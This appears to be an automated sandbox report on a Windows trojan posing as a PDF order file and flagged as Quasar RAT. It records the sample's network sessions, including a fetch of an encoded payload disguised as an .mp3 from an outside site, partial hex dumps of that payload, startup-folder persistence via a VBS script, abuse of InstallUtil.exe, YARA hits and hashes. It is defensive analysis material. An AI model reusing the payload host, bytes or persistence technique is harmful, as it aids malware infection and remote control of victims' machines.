                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449733195.201.57.904433624C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-18 07:17:09 UTC150OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                                      Host: ipwho.is
                                                                      Connection: Keep-Alive
                                                                      2024-11-18 07:17:09 UTC223INHTTP/1.1 200 OK
                                                                      Date: Mon, 18 Nov 2024 07:17:09 GMT
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: ipwhois
                                                                      Access-Control-Allow-Headers: *
                                                                      X-Robots-Tag: noindex
                                                                      2024-11-18 07:17:09 UTC1033INData Raw: 33 66 64 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61
                                                                      Data Ascii: 3fd{ "About Us": "https:\/\/ipwhois.io", "ip": "155.94.241.187", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "Texa


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449734185.78.221.734431344C:\Users\user\AppData\Roaming\MaxGeneration.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-18 07:17:14 UTC86OUTGET /slim/Wyaiccfynhd.mp3 HTTP/1.1
                                                                      Host: www.oleonidas.gr
                                                                      Connection: Keep-Alive
                                                                      2024-11-18 07:17:15 UTC300INHTTP/1.1 200 OK
                                                                      Date: Mon, 18 Nov 2024 07:17:14 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 18 Nov 2024 00:17:26 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 2120192
                                                                      Cache-Control: max-age=1209600
                                                                      Expires: Mon, 02 Dec 2024 07:17:14 GMT
                                                                      Vary: User-Agent
                                                                      Connection: close
                                                                      Content-Type: audio/mpeg
                                                                      2024-11-18 07:17:15 UTC7892INData Raw: 7c 6b a0 31 32 30 31 31 34 31 31 30 ce ce 30 31 89 30 31 31 30 31 31 30 71 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 31 31 30 b1 31 30 31 3f 2f 8b 3f 30 85 38 fd 10 89 31 7d fc 11 65 59 59 42 11 40 43 5e 57 43 50 5d 11 52 51 5f 5f 5f 45 11 52 54 11 42 44 5f 10 58 5f 10 75 7e 63 11 5c 5f 55 54 1e 3c 3c 3a 15 31 30 31 31 30 31 31 60 74 31 30 7d 30 33 31 1b eb 7b 8a 30 31 31 30 31 31 30 31 d1 30 3f 10 3b 30 01 30 31 63 10 31 31 36 31 31 30 31 31 30 cf 41 10 31 31 10 31 31 30 b1 11 30 31 31 70 31 31 10 31 31 30 33 31 30 35 31 30 31 31 30 31 31 34 31 31 30 31 31 30 31 31 f0 11 31 30 33 31 30 31 31 30 31 32 30 71 b4 30 31 21 30 31 21 30 31 31 30 21 31 30 21 31 30 31 31 30 31 3e 30 31 31 30 31 31 30 31 31 30
                                                                      Data Ascii: |k120114110010110110q10110110110110110110110110110110110101?/?081}eYYB@C^WCP]RQ___ERTBD_X_u~c\_UT<<:1011011`t10}031{011011010?;001c116110110A11110011p111103105101101141101101110310110120q01!01!0110!10!101101>0110110110
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: a7 ce ce cf 23 31 30 26 1b 30 31 31 22 31 31 24 1b 31 30 31 23 30 31 26 1a 31 31 30 22 01 33 31 35 30 31 31 30 31 31 30 31 31 30 1b 23 30 31 25 1a 31 31 30 22 01 33 31 35 30 31 31 30 31 31 30 31 31 30 1b 23 30 31 26 1a 31 31 30 22 01 33 31 35 30 31 31 30 31 31 30 31 31 30 1b 13 30 25 94 77 31 31 32 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 24 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 22 31 31 26 1b 31 30 31 22 00 32 31 34 31 31 30 31 31 30 31 31 30 31 1b 23 01 32 30 35 31 30 31 31 30 31 31 30 31 31
                                                                      Data Ascii: #10&011"11$101#01&110"3150110110110#01%110"3150110110110#01&110"31501101101100%w112101"2141101101101"11$101"2141101101101"11$101"2141101101101"11$101"2141101101101"11$101"2141101101101"11&101"2141101101101#2051011011011
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: 11 30 31 31 30 09 f0 cf ce ce 1a 4f a8 32 31 35 18 64 36 30 37 11 31 31 31 30 4f b2 32 31 35 4b 1e 33 30 35 08 92 ce ce cf 17 11 30 31 31 30 09 a6 cf ce ce 22 31 31 27 1b 31 30 31 23 30 31 25 1a 31 31 30 32 01 38 31 35 30 31 31 30 31 31 30 31 31 30 1b 70 2c 31 31 30 31 31 30 d4 31 30 31 55 31 31 31 79 33 31 30 09 31 30 31 26 30 31 30 23 01 32 30 b1 31 30 31 30 30 31 20 18 91 33 30 37 11 31 31 31 30 cf 3f 30 31 09 30 31 31 30 cf 3d 30 31 74 33 31 31 30 34 31 30 31 1e 30 31 31 1e 31 31 30 09 31 30 31 31 4e ab 33 30 35 19 69 36 31 36 11 33 30 31 31 4e b2 33 30 35 4a b7 33 31 34 0b fd cf ce ce 16 11 31 30 31 31 08 f0 ce cf ce 1b 4e a8 33 30 35 19 65 36 31 36 11 31 30 31 31 4e b2 33 30 35 4a 57 33 31 34 0b 93 cf ce ce 16 11 31 30 31 31 08 a6 ce cf ce 23 30 31
                                                                      Data Ascii: 0110O215d6071110O215K3050110"11'101#01%11028150110110110p,110110101U111y310101&010#20101001 3071110?010110=01t311041010111101011N305i6163011N305J3141011N305e6161011N305JW3141011#01
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: 2e 72 30 11 26 30 31 30 30 31 29 30 3a 12 30 74 26 30 31 30 2b 01 33 30 1f 31 30 31 31 30 31 31 43 0a 31 30 3b 17 ed 3d 31 30 31 17 27 b1 49 31 31 35 ed 27 31 30 31 31 18 5c 31 30 3b b1 48 30 31 34 ec 37 30 31 31 16 ec 31 30 31 31 1a 31 31 31 2d 31 30 31 31 30 31 3a 3b 31 3d 27 31 31 31 31 31 28 31 3e 17 31 37 27 31 31 31 47 19 bd 33 31 36 0b 3d 30 31 31 43 0a 31 30 3b 33 18 5f 31 30 3b 1b 32 19 b6 32 31 37 1a 31 31 23 01 34 30 09 31 30 31 30 30 31 20 08 1a 31 30 31 35 35 bf 58 72 37 31 30 31 35 08 32 31 30 31 34 be 58 3b 33 34 27 36 5e 0e 30 31 3b 16 33 34 26 37 19 a4 33 31 36 35 37 69 21 33 34 27 73 fe ce ce cf 1b 07 32 32 35 35 32 35 5f 5e 31 30 3b 17 1a 31 31 23 01 34 30 6b 31 30 31 7c 30 31 20 26 3b 09 7a 31 31 30 34 5e 40 31 31 3a 35 37 2f 19 6b 2e
                                                                      Data Ascii: .r0&01001)0:0t&010+301011011C10;=101'I115'1011\10;H01470111011111-101101:;1='11111(1>17'111G316=011C10;3_10;221711#40101001 10155Xr7101521014X;34'6^01;34&731657i!34's225525_^10;11#40k101|01 &;z1104^@11:57/k.
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: 32 31 37 10 2a 31 30 31 09 2d cd ce cf 20 38 21 1a 5f 68 22 20 10 16 31 30 31 09 3b cd ce cf 20 32 21 3c 11 a8 31 31 30 20 3e 18 d7 33 30 37 11 12 31 31 30 09 c0 cb ce ce 08 81 cf cf ce 11 3c 31 31 30 19 c6 32 31 37 0a ec ca cf ce 17 10 39 31 30 31 09 e2 ca ce cf 20 2b 21 2e 0d 90 cf ce cf 11 27 30 31 31 08 8e ca cf ce 20 2a 26 69 23 2b 11 30 31 31 30 19 c9 32 31 37 0a 9b ca cf ce 17 10 25 31 30 31 09 af ca ce cf 20 39 18 da 33 30 37 20 2f 20 34 21 39 19 dc 33 31 36 22 33 10 33 31 30 31 cf 3e 22 31 08 48 ca cf ce 11 30 31 30 30 bc 2d 30 31 30 23 3e 11 13 31 31 30 09 56 cb ce ce 08 f2 ce cf ce 11 35 31 31 30 09 69 cb ce ce 21 39 20 1b 19 de 32 31 37 23 23 11 23 31 31 30 19 c6 32 31 37 0a 0f ca cf ce 17 10 21 31 30 31 09 03 ca ce cf 09 c3 cd ce ce 10 17 31
                                                                      Data Ascii: 217*101- 8!_h" 101; 2!<110 >307110<1102179101 +!.'011 *&i#+0110217%101 9307 / 4!9316"33101>"1H0100-010#>110V5110i!9 217###110217!1011
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: 11 14 31 31 30 11 6e 30 31 31 68 cf 3f 27 31 11 b4 33 31 30 19 62 33 31 37 0a ed de cf ce 17 10 41 33 30 31 09 e1 de ce cf 11 43 30 31 31 10 03 31 30 31 69 ce 3f 26 30 11 cf 31 31 31 18 62 32 30 37 0b 83 de ce cf 17 11 af 30 31 30 09 99 df ce ce ce 3d 57 30 11 2f 30 31 31 10 b8 31 30 31 11 1d 31 31 30 68 ad 10 5e 30 30 31 cf 3e 11 31 08 b0 de cf ce cf 3c 57 31 10 23 31 30 31 11 60 31 31 30 11 5e 30 31 31 68 ad 11 78 30 31 30 09 57 df ce ce 21 61 2b 70 1b 1e 30 31 11 c3 30 31 30 09 65 df ce ce ce 3d 57 30 11 32 30 31 31 10 2f 31 30 31 11 2c 31 31 30 69 ad 10 67 33 30 31 09 05 de ce cf 20 16 28 2e 45 ac 11 13 30 31 31 08 14 de cf ce 2e 2e bc 2d 30 31 30 15 e1 19 32 31 35 18 61 32 30 37 22 13 11 b2 30 31 31 ce 3f 11 30 09 ce de ce ce ce 3d 28 30 11 33 30 31
                                                                      Data Ascii: 110n011h?'1310b317A301C011101i?&0111b207010=W0/011101110h^001>1<W1#101`110^011hx010W!a+p01010e=W02011/101,110ig301 (.E011..-010215a207"011?0=(0301
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: cd ce cf ec 3d 38 31 31 16 11 31 30 31 31 18 65 32 30 37 0b 3f 31 31 30 17 11 30 31 31 30 09 35 30 31 31 ce 3d 41 30 74 30 30 31 31 35 31 31 30 09 31 30 31 31 ed eb 36 30 31 11 26 33 31 30 cf 3f 10 31 09 5e e1 ce cf 27 22 0e 11 2b 32 31 31 18 62 32 30 37 08 50 e1 ce cf 17 11 69 33 31 30 09 64 e0 ce ce 30 09 4a 30 31 31 10 31 31 30 31 19 63 32 31 36 0b 3e 30 31 31 16 11 31 30 31 31 08 35 31 30 31 cf 3c 7a 31 75 3c 31 30 31 58 30 31 31 98 30 31 30 34 31 30 31 8c 30 31 31 91 31 31 30 7b 31 30 31 a0 30 31 31 02 30 31 30 e1 31 30 31 15 30 31 31 dd 31 31 30 42 30 30 31 3b 31 31 31 08 55 31 30 31 09 2a 31 31 30 11 33 30 31 31 18 65 32 30 37 0b 9e ce ce cf 17 11 36 31 31 30 09 92 cf ce ce 21 79 19 29 32 31 36 0b 08 30 31 31 10 31 31 30 31 19 63 32 31 36 08 b9 cf
                                                                      Data Ascii: =8111011e207?11001105011=A0t001151101011601&310?1^'"+211b207Pi310d0J0111101c216>01110115101<z1u<101X0110104101011110{101011010101011110B001;111U101*1103011e2076110!y)2160111101c216
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: 30 09 45 81 ce ce 21 59 20 23 28 69 a1 2e 29 52 20 59 21 22 29 68 a0 2e 20 53 51 21 59 20 23 26 69 a1 2f 53 50 20 59 21 22 a0 50 22 1d 10 c8 30 30 31 09 73 80 ce cf 20 24 be 58 bc 2c 31 31 31 22 78 10 18 31 30 31 19 63 32 31 36 08 18 81 ce ce 16 11 9c 31 31 31 08 2f 80 cf ce 20 20 2e 38 21 68 2b a1 ad 11 92 30 31 30 19 65 33 31 37 09 37 80 cf ce 17 10 19 31 30 31 09 cb 81 ce cf 20 07 2b 2e 45 ac 11 be 31 31 31 18 62 32 30 37 08 d6 81 ce cf 17 11 6d 33 31 30 09 ea 80 ce ce 26 22 06 10 55 33 30 31 09 fe 81 ce cf 11 ea 30 31 31 10 78 31 30 31 68 ce 3f 26 30 11 3d 30 31 31 08 84 81 cf ce 11 fe 31 31 30 11 75 30 31 31 69 cf 3f 08 31 11 71 33 31 30 09 ad 80 ce ce 10 2a 31 30 31 11 21 31 31 30 69 cf 3e 26 31 10 32 31 30 31 19 63 32 31 36 08 4f 80 ce ce 16 11 a8
                                                                      Data Ascii: 0E!Y #(i.)R Y!")h. SQ!Y #&i/SP Y!"P"001s $X,111"x101c216111/ .8!h+010e3177101 +.E111b207m310&"U301011x101h?&0=011110u011i?1q310*101!110i>&12101c216O
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: 31 ce 38 33 30 5e fa 30 31 3b 1a 31 2f 30 19 9d 32 31 37 1a 6b cf 39 31 31 ce 38 30 30 cf 38 32 31 cf 39 32 31 5f 69 31 30 3b 1b 30 1b cf 39 31 31 5f fd 31 30 3b 1b 30 1f 31 ce 38 31 30 19 9c 32 31 37 1a 1b cf 39 31 31 5f f7 31 30 3b 1b 30 1b cf 39 31 31 5f fc 31 30 3b 1b 30 0f 31 ce 38 31 30 cf 38 31 31 19 fe 31 31 3a 1b 27 24 25 cf 31 1b 31 30 3b 25 1a 31 2f 30 19 90 33 31 37 1a 1f 31 ce 38 31 30 19 57 30 31 3b 1a 1f 31 ce 38 31 30 19 50 30 31 3b 1a 1b cf 39 31 31 5f 88 31 30 3b 1b 30 1b cf 39 31 31 5f f6 31 30 3b 1b 30 2f 31 18 fe 31 30 3b 1b 1e 31 cf 39 31 31 18 e1 31 30 3b 1b 1e 31 cf 39 31 31 18 8b 31 30 3b 1b 0a cf 38 30 31 cf 39 30 31 5f 73 31 30 3b 1b 30 1b cf 39 31 31 5f 49 32 30 37 1b 30 0b cf 39 31 31 ce 38 30 30 5e 6a 30 31 3b 1a 31 1b ce 38
                                                                      Data Ascii: 1830^01;1/0217k911800821921_i10;0911_10;01810217911_10;0911_10;0181081111:'$%110;%1/03171810W01;1810P01;911_10;0911_10;0/110;191110;191110;801901_s10;0911_I2070911800^j01;18
                                                                      2024-11-18 07:17:15 UTC8000INData Raw: 31 11 0c 31 31 30 68 ad 10 93 30 30 31 09 03 dd ce cf cf 3d 14 31 11 3b 31 31 30 11 ff 30 31 31 10 75 31 30 31 68 ac 11 30 31 31 31 08 25 dd cf ce cf 3c 15 31 10 26 31 30 31 cf 3c 13 31 ac 11 da 30 31 31 08 cd da cf ce 20 24 26 69 23 25 11 5a 31 31 30 cf 3f 33 31 09 d4 da ce cf 11 a3 30 31 31 10 10 31 30 31 69 ce 3f 13 30 11 b6 30 31 31 18 8e 32 30 37 08 fa da ce cf 17 11 1f 31 31 30 09 8e db ce ce ce 3d 15 30 11 2a 30 31 31 10 21 31 30 31 11 3d 31 31 30 68 ad 10 7b 31 30 31 09 90 da ce cf cf 3d 14 31 11 24 31 31 30 cf 3d 12 31 ad 10 88 31 30 31 09 b8 da ce cf cf 3d 14 31 11 2e 31 31 30 11 f2 30 31 31 10 70 31 30 31 68 ac 11 18 30 31 31 08 58 da cf ce 11 43 31 31 30 11 7b 30 31 31 68 cf 3f 12 31 11 18 31 31 30 19 8f 33 31 37 09 7a da cf ce 17 10 73 31 30
                                                                      Data Ascii: 1110h001=1;110011u101h0111%<1&101<1011 $&i#%Z110?31011101i?0011207110=0*011!101=110h{101=1$110=1101=1.110011p101h011XC110{011h?1110317zs10


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:02:16:58
                                                                      Start date:18/11/2024
                                                                      Path:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
                                                                      Imagebase:0x320000
                                                                      File size:1'484'288 bytes
                                                                      MD5 hash:ABBFB2B5EBF6A24EEF7269BDE8E80640
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1739089307.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:02:17:02
                                                                      Start date:18/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                      Imagebase:0x220000
                                                                      File size:42'064 bytes
                                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:2
                                                                      Start time:02:17:12
                                                                      Start date:18/11/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs"
                                                                      Imagebase:0x7ff7795a0000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:02:17:12
                                                                      Start date:18/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\MaxGeneration.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\MaxGeneration.exe"
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:1'484'288 bytes
                                                                      MD5 hash:ABBFB2B5EBF6A24EEF7269BDE8E80640
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1884455692.0000000004C3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 32%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:02:17:16
                                                                      Start date:18/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                      Imagebase:0xd70000
                                                                      File size:42'064 bytes
                                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 047F5A08 Relevance: .3, Instructions: 283COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d17b19622cec10aa9145251822949f434b78c5373308f01d1170aea40070cd4
                                                                        • Instruction ID: f4d0ae6e205c8ff4f07faa43bd2ce0e3ce1f7e6708984e9d733c5a609caf5fa2
                                                                        • Opcode Fuzzy Hash: 2d17b19622cec10aa9145251822949f434b78c5373308f01d1170aea40070cd4
                                                                        • Instruction Fuzzy Hash: AEC1F5B4E11218DFDB54DFAAD884B9DBBF2FB89300F14906AD509A7356DB346985CF00
                                                                        Function 047F5A18 Relevance: .3, Instructions: 277COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26c02aa9f38d44756c0af762b74c5d1dd12bb3f26d1b7bf9e97ef499a68fd744
                                                                        • Instruction ID: e59914414d34b09d63436f1a5e60d94005cbfe5795ee1d47be76cb578f50703e
                                                                        • Opcode Fuzzy Hash: 26c02aa9f38d44756c0af762b74c5d1dd12bb3f26d1b7bf9e97ef499a68fd744
                                                                        • Instruction Fuzzy Hash: 49C1F570E11218DFDB54DFAAD884BADBBF2FB89300F14906AD509A7356EB346985CF00
                                                                        Function 00DF413F Relevance: 5.2, Strings: 4, Instructions: 189COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d%dq$d%dq$$^q$$^q
                                                                        • API String ID: 0-141320698
                                                                        • Opcode ID: 657b240f8b635a5520cff3cd5dea54079d9822c55dc1b5c86c48a7229236ad5d
                                                                        • Instruction ID: 1f1c23a7c2d390316cdd80fe2be91f1e819cd839286342bb69d5e19a68a180ac
                                                                        • Opcode Fuzzy Hash: 657b240f8b635a5520cff3cd5dea54079d9822c55dc1b5c86c48a7229236ad5d
                                                                        • Instruction Fuzzy Hash: 2C51D330B403089BDB189A389C50B3B76E7BBD5710F26C929D606DB3E4DA31DD8187A1
                                                                        Function 00DF451F Relevance: 5.0, Strings: 4, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 886b736c8b166f5d8f04958d6c82816efde14b10f0308365695db1da875e90e4
                                                                        • Instruction ID: 64998ca32c6153059c3e3b2bcb432e587dfe759a195eb4bbd83e4cbba0268042
                                                                        • Opcode Fuzzy Hash: 886b736c8b166f5d8f04958d6c82816efde14b10f0308365695db1da875e90e4
                                                                        • Instruction Fuzzy Hash: E7B0929280E388DFCB035E9448C01627F60BA6224032EC4EAC8890F24BD015CA86E771
                                                                        Function 047FA366 Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$/
                                                                        • API String ID: 0-2587683793
                                                                        • Opcode ID: 3c3b201a8235d0039284593a8bc4c3e8f51a5faeb8506a15f545cf506f42fbd7
                                                                        • Instruction ID: 562d59663dea41465f1d34f8684801f8f34e7db04e946b3d793dd432dcbaec0f
                                                                        • Opcode Fuzzy Hash: 3c3b201a8235d0039284593a8bc4c3e8f51a5faeb8506a15f545cf506f42fbd7
                                                                        • Instruction Fuzzy Hash: 42F0A4B490022ACFCB24DF14D988B98BBF1BB04305F1081EAD119A3692D335AAC4DF04
                                                                        Function 00DF6485 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: sq
                                                                        • API String ID: 0-1320738648
                                                                        • Opcode ID: c4df5ccde7888d457be3b01ed3b07c3b74dcc88ec509ace466cac6e82b86b69b
                                                                        • Instruction ID: 4a160ac8b5bc9f194fcb9905636525ec1acee972b44d099ba5492a129b8c7e27
                                                                        • Opcode Fuzzy Hash: c4df5ccde7888d457be3b01ed3b07c3b74dcc88ec509ace466cac6e82b86b69b
                                                                        • Instruction Fuzzy Hash: 97417870D0424C9FCB14DFA9C594AEEBFF1EF48304F198469E649AB354DB349945CBA0
                                                                        Function 00DF1CB0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
